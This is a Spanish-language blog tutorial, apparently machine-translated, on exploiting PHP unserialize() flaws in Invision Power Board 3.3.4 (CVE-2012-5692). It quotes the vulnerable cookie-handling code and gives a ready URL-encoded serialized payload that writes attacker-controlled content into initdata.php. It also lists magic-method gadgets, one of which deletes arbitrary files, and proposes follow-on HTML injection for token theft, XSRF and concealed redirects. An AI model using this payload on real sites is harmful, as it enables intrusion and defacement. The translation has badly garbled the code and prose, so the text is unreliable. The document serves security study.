¿Cansado de los mismos artículos de re-hash en la explotación de las inyecciones SQL, XSS, XSRF, Inclusión, desbordamientos básicos, y más del archivo? Soy, por lo que empecé a escribir el material más interesante. Esto comenzó con «Aplicaciones Explotando Modern espacio de usuario de Linux». Un cuento en pasar por modernos explotar mitigaciones y aventuras reales en el mundo x64 sin apagar ASLR. Ahora estoy aquí para presentar una serie llamada «Los exploits de escritura para las clases de bichos exóticos». Esta será aventuras en la explotación de las clases de errores comunes que no se habla con tanta frecuencia. Ellos serán co-presentado con exploits para aplicaciones modernas (2012-2013), asumiendo posiblemente 0 días posibilidades legales con un determinado proveedor, una más fácil de consumir de diapositivas y, como siempre, una pitón en armas explotan. Disfrute!

Parte 1.) unserialize

La primera parte de esta serie será en la escritura de exploits para unserialize () vulnerabilidades en PHP. Esta clase de errores es realmente el bebé de Stefan Esser y un montón de trabajo preliminar se ha cubierto desde 2009 por él y su obra «Noticias impactantes en PHP Explotación». Sin más preámbulos, vamos a entrar en ella.

Qué es Serialize y unserialize?

Serialize () genera una representación de cadena de valores de PHP. Se utiliza para almacenar o pasar alrededor de estos valores para su uso posterior. Serialize maneja todos los valores PHP a excepción de los recursos (referencias a recursos externos). Por otro lado, unserialize () toma esta cadena y se recuperan los valores de PHP.

El tema y la Advertencia

unserialize () experimenta problemas de inyección controlados por el usuario típico tanto como SQLi y XSS. En la página unserialize, vemos la advertencia:

«no pasan la entrada del usuario no es de confianza para unserialize () Unserialization puede resultar en código que se carga y se ejecuta debido a la creación de instancias de objetos y carga automática de clases, y un usuario malicioso. puede ser capaz de explotar esta …. «

Aprendizaje Explotación The Hard Way: Abusar Aplicaciones Reales

A fin de orientar adecuadamente a alguien a través explotación, necesitaremos una vulnerabilidad real en un escenario realista. Para ello, vamos a echar un vistazo a Invision Power Board 3.3.4. De acuerdo con CVE-2012-5692, 3.1.x Invision Power Board a 3.3.4 incluido es vulnerable a un unserialize controlada por el usuario () string. La descripción sobre la vulnerabilidad en http://secunia.com/advisories/51104 es:

«La vulnerabilidad es causada debido a la admin / fuentes / base / script core.php utilizando el» unserialize ( ) «la función con entrada controlada por el usuario. Esto puede ser explotado para por ejemplo crear un archivo de caché con código PHP arbitrario a través del» __destruct () «método de la» dbMain () «clase a través de un objeto serializado especialmente diseñado enviado en un» Cookie » encabezado.

Una explotación exitosa puede permitir la ejecución de código arbitrario, pero requiere el «short_open_tag» habilitado «.

Por el momento esto se hace, usted debe conseguir un verdadero ejemplo de por qué usted no debe tomar «restricciones» impuestas al corazón.

La vulnerabilidad

Vamos a encontrar la vulnerabilidad en admin / fuentes / base / core.php comenzando en clase IPSCookie, public function get () , a partir de la línea 4012:

 
 static public function get ($  name)  [1]  
 
 {/ * Comprobar los datos internos primero * / 
 if (isset (self :: $  _cookiesSet [$  nombre])) {
 de retorno automático /> 
 
 else if (isset ($  _COOKIE [ipsRegistry :: $  ajustes ['cookie_id']. $  name]))  [2]  
 
 {$  _Value = $  _COOKIE [ipsRegistry :: $  ajustes ['cookie_id'] $  name];  [3]  
 
 if (substr ($  _Value, 0, 2) == 'a:').  [ 4]  
 
 {volver unserialize (stripslashes (UrlDecode ($  _Value)));  [5]  
} 
 demás 
 {
 volver IPSText :: parseCleanValue (urldecode ($  _Value));} 
 
} 
 
 
 else {return false; 
}} 
 
 

La función get ($ name) en [1] consigue un valor de la cookie de nombre dado $ . Se comprueba en [2] para ver si la cookie existe, a continuación, establecer como $ _Value en [3]. Si la cookie comienza con un: (array serializado) en [4] se UrlDecode (), stripslashes () y unserialize los $ _Value en [5].

The Path Vulnerable

Ahora tenemos que saber lo que se requiere para llegar a la ruta de acceso vulnerables y activar la vulnerabilidad. Para ello tendremos que buscar el código para encontrar lo que alcanza IPSCookie :: get. Grep simple viene al rescate aquí:.

Grep IPSCookie :: get-r /

Hay tranquila algunas entradas aquí con uno de mencionar los valores de cookie directamente controladas:

 
 admin / fuentes / classes / session / publicSessions.php: 341 
 $  cookies ['session_id'] = IPSCookie :: get ('session_id'); 
 $  cookies ['member_id'] = IPSCookie :: get ('member_id'); 
 $  cookies ['pass_hash'] = IPSCookie :: get ('pass_hash'); 
 

Si usted lee a través de este archivo (y dada el nombre del archivo), encontramos esta se ejecuta en la clase __ constructo y se activa en la construcción de cualquier usuario y sesión de invitado. Esto significa que no se requiere inicio de sesión y la construcción de una sesión de invitado se disparará el camino a nuestra vulnerabilidad.

Entendiendo el Serialized Cadena

Cuando se busca inicialmente en una cadena serializada de PHP o cualquier forma serializados, las cosas se ven completamente extraño. Sin embargo, es un formato muy fácil cuando usted entiende exactamente lo que está pasando. Cuando enviamos nuestra carga útil, se ve como:

a%3A1%3A%7BO%3A15%3A%22db_driver_mysql%22%3A1%3A%7Bs%3A3%3A%22obj%22%3Ba%3A2%3A%7Bs%3A13%3A%22use_debug_log%22%3Bi%3A1%3Bs%3A9%3A%22debug_log%22%3Bs%3A12%3A%22initdata.php%22%3B%7D%7D%7D

Después de que el proceso de decodificación URL:

a:1:{O:15:»db_driver_mysql»:1:{s:3:»obj»;a:2:{s:13:»use_debug_log»;i:1;s:9:»debug_log»;s:12:»initdata.php»;}}}

Así que esto plantea la cuestión de qué es exactamente lo que está pasando aquí? Al mirar de nuevo en php.net / serializar el primer comentario revela lo que algunos de estos valores significa:

 usuario: egingell en sisna punto com 
 / * 
 Anatomía de un serialize () "valor ed: 
 
 
 Cadena s: tamaño: valor; 
 
 
 Entero i: valor, 
 
 Boolean 
 b: valor, (no almacena "verdadero" o "falso", hace store '1 'o '0') 
 
 
 Null N; 
 
 Array 
 a: size: {definición de la clave, la definición de valor; (repetido por elemento)} 
 
 
 O Objeto: strlen (nombre del objeto): Nombre del objeto: el tamaño del objeto : {: strlen (nombre de la propiedad): nombre de la propiedad: s de definición de la propiedad; (repetido por propiedad)} Los valores de cadena 
 
 siempre entre comillas dobles 
 claves de matrices son siempre números enteros o cadenas 
 "null => 'valor'" equivale a 's: 0: ""; s: 5: "valor", "
" true =>' valor '"equivale a' i: 1; s : 5: "valor", "
" false => 'valor' "equivale a 'i: 0; s: 5:" valor "," 
 "array (sea cual sea el contenido) = > 'valor' "equivale a una" advertencia de tipo de desplazamiento ilegal "porque no se puede utilizar una matriz /> 
 
 y de intentar usar un objeto como clave resultará en el mismo comportamiento que el uso de una matriz se 
. * / 
 

Con este entendimiento, vamos a romper aparte la carga útil de la explotación:

 
 a: 1: {| matriz con un elemento 
 O: 15: "db_driver_mysql ": 1: {| Referencia, 15 caracteres de longitud, el nombre" db_driver_mysql ", tiene una propiedad 
 s: 3:" obj "; | Cadena, 3 caracteres de longitud, el valor" obj "
 a: 2 : {| matriz con dos elementos 
 s: 13: "use_debug_log"; | Cadena, 13 caracteres de longitud, el valor 
 i: 1; | Valor entero de 1 
 s: 9 
 s |; "debug_log": 12: "initdata.php";}}} | Cadena, 12 caracteres de longitud, el valor "initdata.php", dos arreglos finales y un objeto 
 

Esto debería ser suficiente para comprender los valores de la cadena serializada.

Deeper mirada en proceso PHP unserialize

¿Qué pasa con lo que no se menciona en el comentario anterior? Echando un vistazo al código fuente php en ext / standard / var_unserializer.c en el php_var_unserialize (función) a partir de la línea 476:

 
 interruptor (yych) {case /> 
 caso 'O': yy13 Goto; 
 caso 'N': yy5 Goto; 
 case 'R': YY2 Goto; 
 case 'S': Ir yy10; 
 case 'a': yy11 Goto; 
 caso 'b': YY6 Goto; 
 caso 'd': YY8 Goto; 
 case 'i': yy7 Goto; 
 caso ' o ': YY12 Goto; 
 case' r ': yy4 Goto; 
 caso' s ': yy9 Goto; 
 caso'} ': Ir yy14; 
 defecto: Goto yy16 ; 
 

Comparando esto con el comentario anterior, hay algunos que no fueron mencionados y un par de carcasas adicionales. Para ahorrarles el laberinto Goto (termina a yy98), se puede ver en la versión de los proyectos de php.js unserialize para algunos de estos valores extra. A pesar de que no tiene todo lo que, sin duda es más fácil de seguir algunos de la lógica más confuso en la fuente de php. http://phpjs.org/functions/unserialize/

Así que lo que tenemos de que no fue mencionado en el sitio php.net?

 caso 
 'O': | O: puede ser seguido por un + con O: + 
 case 'R': | R: #, que se utiliza como Número de referencia (diversión con referencia a sí misma) caso /> 
 ONRS tienen cada uno las formas mayúsculas y minúsculas 
 

Nuevo en PHP: Automatizado de Ataque

Con una sólida comprensión del formato serializado PHP, vamos a ver que la advertencia de nuevo:

«Unserialization puede resultar en código que se carga y se ejecuta debido a la creación de instancias de objetos y carga automática»

Así que ahora que definir algunas cosas. Instanciación es cuando una clase se convierte en un objeto mediante la creación de una instancia de la clase en la memoria. Por eso, cuando en realidad se llama nueva clase (), clase () es ahora un objeto instanciado.

La carga automática es donde la verdadera bestia entra en juego. Esto permite a un desarrollador para llamar objetos instanciados desde cualquier ubicación. Este nació de estilo OOP de PHP. Al permitir que este formato de carga automática, el desarrollador no está obligado a requerir (_once) / include () _once varias bibliotecas en todas las páginas que podrían ser necesarios. En su lugar, usted amarra una página a autoload estos objetos y utilizarlos a su antojo. Hay funciones que le permiten carga automática de forma manual y los que lo hará de forma automática. Tenga en cuenta que esto puede llevar a vulnerabilidades en sí mismos.

Como desarrollador, puede usar la función mágica __ autoload o uso spl_autoload_register manualmente las bibliotecas de carga automática. Para obtener más información sobre estas funciones y cómo usarlos visite http://php-autoloader.malkusch.de/en/.

Un poco más interesante es la cantidad de funciones que iniciará el cargador automático para usted. Estas funciones son:

 
 call_user_func () 
 call_user_func_array () 
 class_exists () 
 class_implements () 
 class_parents () 
 class_uses () 
 get_class_methods () 
 get_class_vars () 
 get_parent_class () 
 interface_exists () 
 is_a () 
 is_callable () 
 is_subclass_of () 
 method_exists () 
 property_exists () 
 spl_autoload_call () 
 trait_exists () 
 

Como se ha dicho, estos pueden introducir vulnerabilidades en sí y por sí mismos. Para obtener más información sobre esta investigación y donde esta lista fue retirado, por favor visite http://hakre.wordpress.com/2013/02/10/php-autoload-invalid-classname-injection/.

Tomando ventaja de «Magic»

magos Alright, ahora debería entender la mayor parte de la cuestión. Sin embargo, el proceso unserialization sólo convierte una cadena serializada en valores de PHP. No se puede llamar necesariamente funciona para usar estos valores, a menos unserialize_callback_func se establece. Todavía son pocos los valores, así que ¿cómo podemos tomar ventaja de estos valores? Abusamos de algo que se llama funciones mágicas.

funciones mágicas son funciones que se ejecutan automáticamente cuando ciertos eventos / acciones suceden. Esto nos permite ir a una función con nuestros valores PHP actuales. Echando un vistazo a http://php.net/manual/en/language.oop5.magic.php debería ver una buena lista de funciones mágicas. Estos son __ construct (), __ destruct (), __ call (), __ callStatic (), __ get (), __ set (), __ isset (), __ unset (), __ sleep (), __ wakeup (), __ toString (), __ invoke (), __set_state () y __ clone (). Así que cuando hacen estos se llaman?

 
 __construct () 
 se llama cuando se crea una nueva  objeto . 
 __destruct () 
 Se llama cuando no hay más referencias a un oponerse o cuando un objeto se destruye manualmente. Además, cuando termina la secuencia de comandos, todos los destructores son llamados. Esto se conoce aún si se le dio la salida () / salida, a menos que se le da en el interior del destructor 
 
 sucede cuando se intenta invocar un método inaccesible en un contexto del objeto 
 Ex..: $  obj = newMethod, $  obj-> inaccesible (); 
 __callStatic () 
 Igual __ call, pero en un contexto estático 
 Ex:. Método :: inaccesible (); 
 __get () 
 Se activa al escribir datos en propiedades inaccesibles. 
 __set () 
 Se activa cuando la lectura de datos de propiedades inaccesibles. 
 __isset () 
 Cuando isset () o empty () es llamado en las propiedades inaccesibles. 
 __unset () 
 Cuando unset () se utiliza en las propiedades inaccesibles. 
 __sleep () 
 Esta función se ejecuta antes de la serialización de dar tiempo extra para terminar los valores posiblemente pendientes a serializar. Por lo general, sólo devuelve una matriz de nombres de variable para el objeto. 
 __wakeup () 
 Unserialize () activa este para permitir la reconstrucción de los recursos que se utilizarán en conjunción con o necesario para los valores de PHP decodificados de vuelta. 
 __toString () 
 Esto desencadena cuando tratas a una clase como una cadena. Antes de PHP 5.2.0 sólo echo o print podría desencadenar este. Ahora puede suceder en cualquier contexto cadena como printf 
 Ex:.. Echo $  clase; 
 __invoke () 
 Hit cuando se trata de llamar a un objeto como una función 
 Ex: $  la clase ("hola"); 
 __set_state) 
 Cuando una clase es exportado por var_export, este se ejecuta (. Esto sólo contendrá un array de las propiedades de la clase exportados. 
 __clone () 
 La función corrió al clonar un objeto. 
 

 
 public function __ wakeup () {
 
 $  this-> connect ();} 
 
 
 ... private function connect () 
 
 {$  this-> enlace = mysql_connect ($  this-> servidor, $  this-> nombre de usuario, $  this-> contraseña); 
 mysql_select_db ($  this-> db, $  this -> enlace);} 
 
 

 
 ips_kernel / classXmlRpc.php 
 xml_parser_free ($  this-> parser); 
 ips_kernel / classImageImagemagick.php 
 if (is_file ($  this-> temp_file)) { @ unlink ($  this-> temp_file);. 
 * Con esto, tenemos la capacidad de eliminar un archivo arbitrario dentro del contexto correspondiente permiso 
 ips_kernel / classEmail.php 
 if ($  this- > mail_method == 'smtp') {$  this-> _smtpDisconnect (); 
 ips_kernel / classFtp.php 
 @ ftp_close ($  this-> stream); 
 admin / fuentes / classes / salida / publicOutput.php 
 if (($  get_class este)! = 'output') {return 
 * Esto devolverá el nombre de la clase. 
 admin / sources / loginauth / ldap / auth.php 
 if ($  this-> connection_id) {ldap_unbind ($  this-> connection_id); 
 ips_kernel / classDb.php 
 public function __ destruct () {
 
 $  this-> return_die = true; 
 if (count ($  this-> obj ['shutdown_queries'])) {
 
 foreach ($  this-> obj ['shutdown_queries' ] as $  q) 
 
 {$  this-> query ($  q);} 
 
 
} $  this-> writeDebugLog ('{end}', '',''); 
 $  this-> obj ['shutdown_queries'] = array (); 
 $  this-> Desconectar ();} 
 
 

 
 ips_kernel / classDb.php: 
 writeDebugLog función pública ($  consulta, $  data, $  tiempo del fin, $  fileToWrite = ' ', $  Backtrace = FALSO) 
 
 {$  fileToWrite = ($  fileToWrite)? $  FileToWrite: $  this-> obj ['debug_log']; 
 
 ... else if ($  consulta == '{end}' AND ($  this-> obj ['use_debug_log'] Y $  this-> obj ['debug_log'])) {
 
 $  _string = " n ======================= ================================================== ===== ";. 
 $  _string ="  n ========================= FIN ====== ============================= ";. 
 $  _string ="  n ======== ================= ". $  _SERVER ['PHP_SELF']. "?" . $  _SERVER ['QUERY_STRING']. "===================================";. 
 $  _string = " N = ================================================== =========================== ";} 
 
 
 ... if ($  _string Y $  FH = @ fopen ($  fileToWrite, 'a')) {
 
 @ fwrite ($  FH, $  _string); 
 @ fclose ($  FH);} 
 
 

 index.php /> 
 IpsRegistry.php require_once /> 
 $  classname = "db_driver_". $  Db_driver; 
 self :: $  dbObjects [$  clave] = new $  classname; 
 * En este punto, db_driver_mysql ahora se crea una instancia y un objeto disponible 
 
 ClassDbmysql.php. require_once (dirname (__ FILE__) '/ classDb.php'.); 
 * Ahora classDb clases están disponibles por la clase instanciada antes 
 

 
 $  fileToWrite = ($  fileToWrite)? $  FileToWrite: $  this-> obj ['debug_log']; 
 ($  this-> obj ['use_debug_log'] Y $  this-> obj ['debug_log']) 

 
 "" (ASCII 32 (0x20)), un espacio en blanco. 
 " t" (ASCII 9 (0x09)), una ficha. 
 " n" (ASCII 10 ( 0x0A)), una nueva línea (salto de línea). 
 " r" (ASCII 13 (0x0D)), un retorno de carro. 
 "" (ASCII 0 (0x00)), el NUL bytes . 
 " x0B" (ASCII 11 (0x0B)), una pestaña vertical. 
 

index.php aplicación [] = miembros & module = sección y perfil = dname & id = 1 Warning: trim () espera parámetro de 1 a ser cadena, matriz dada en C: xampp-portátiles htdocs invision admin sources base ipsRegistry.php on line 1774 />
Incluso sin un FPD personalizado (o se signatured más adelante, cuando esta se libera), entre nuestro controlada $ _SERVER [' .. QUERY_STRING '] y el signo de igualdad es un espacio único Inyectando sólo un Cuando todo falla

Así que, digamos que usted necesita algo universal que no es específica del sistema operativo, Zend Framework no se utiliza, no hay otro ataque aumento de superficie con marcos / plugins se utilizan, las etiquetas cortas no está activado, y PHP <5.4.0. Ahora ¿qué podemos hacer? />
No se puede utilizar XML Entidades externas a causa de tapón de la demostración. Bueno, aún existe la posibilidad de inyección de HTML para robar fichas, realice XSRF, etc Sólo hay un problema que es la mayoría de los archivos son PHP y, o bien no terminan su PHP o llamar a exit ();. Esto tampoco da un error o no se ejecuta. Así que el objetivo es encontrar cualquier tipo de localizaciones de inyección útiles. El todopoderoso grep al rescate una vez más!

 
 for i in $  (grep ">"-r. / . ">". |; - l-exclude = * png) hago si tail-n 5 $  grep-i q, y luego echo $  i; fi; hecho 
 / conf_global.php 
 . / dav.php 
. / interface / facebook / index.php 
. / interface / facebook / channel.php 
. / 
 initdata.php. / ips_kernel / HTMLPurifier / HTMLPurifier/Lexer/PH5P.php 
. / ips_kernel / facebook-cliente / jsonwrapper / JSON / JSON.php 
 
 ./ips_kernel/i18n/ConvertCharset.class.php ./ips_kernel/pop3class / parse_message.php 
 
 ./ips_kernel/pop3class/pop3.php ./ips_kernel/pop3class/test_pop3.php 
 
 ./ips_kernel/pop3class/browse_mailbox.php. / ips_kernel / twitter / OAuth.php 
. / ips_kernel / class_xml.php 
. / ips_kernel / PEAR / JSON / JSON.php 
 ./admin/js/3rd_party/jquery.min.js 
. / admin / sources / loginauth / live / lib / windowslivelogin.php 
. / admin / install / index.php 
. / admin / setup / aplicaciones / actualización / secciones / overview.php 
. / admin / setup / xml / skins / replacements_xmlskin.xml 
 

Después de todos esos archivos, sólo dos son lugares de inyección, ya sea válida o universalmente aceptables. Ambos apuntan al mismo lugar y son initdata.php y conf_global.php. Ambos se ejecutan al ver index.php. Ahora, el fopen es en modo de adición, por lo que los datos se escriben en la parte inferior de las páginas PHP, que se mostrará y se inyecta en la parte superior de la página real. Esto significa que es un poco más evidente debido a los caracteres de tope muestran ASCII. Esto también se romperá el diseño en el navegador IE. Si realmente quieres usarlo y no ser obvio sobre la inyección (defacers no necesitan preocuparse aquí ), tendrás que agarrar dinámicamente la página en la vista, enjuague el contenido de la página actual y el uso document.write (String.fromCharCode ()) para volver a escribir la página. También puede utilizar un poco de magia de CSS y ocultar / capa sobre la área de la inyección visible o simplemente redirigir a una copia espejo en su propio servidor, esto es todo limitado a su imaginación inyección HTML.

Finales y Varios. Ideas

A veces toda esta locura, simplemente no es necesaria en función de la vulnerabilidad. Sobre la base de la ubicación y el flujo de la lógica, simplemente podría abusar de cómo se utilizan los objetos decodificados de vuelta. Por ejemplo, los datos de revertir la seriación para la autenticación. Aunque esto no es un probable escenario, algunos errores son simplemente "especial" en su aplicación.

Porque usted puede fácilmente ensucie con el flujo de PHP intérprete y tipos de datos, las cuestiones de interpretación pueden convertirse en un problema. Si se miraba en el código fuente en ext / standard / var_unserializer.c en función php_var_serialize () que le de cuenta de la utilización de unos contadores de referencia par Esto puede conducir a mucho más interesante y hazañas impresionantes como su uso después de forma gratuita, como se ve con Stefan Esser SplObjectStorage UAF:.

http://php-security.org/2010/06/25/mops-2010-061-php-splobjectstorage-deserialization-use-after-free-vulnerability/

En general, estos son mucho más específicos a las versiones de PHP y requiere obstáculos adicionales para usar, como se ha visto con el SplObjectStorage UAF.

El Exploit